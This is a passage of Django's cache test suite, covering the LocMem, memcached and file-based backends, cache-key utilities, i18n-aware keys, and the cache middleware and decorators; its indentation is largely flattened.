# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
        self.assertTrue(os.path.exists(self.dirname))
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
    Tests for the ability to mix in a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(TestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
        del self.DEFAULT_TIMEOUT
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
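        # Helper for the test below: build a request with the given Accept-Language
        # and Vary headers, learn its cache key, and assert that both the learned
        # and the recomputed key match reference_key.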
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
        # change the language again
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
        # change the language again
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
    Tests various headers with TemplateResponse.

    Most are probably redundant since they manipulate the same object
    anyway, but the ETag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
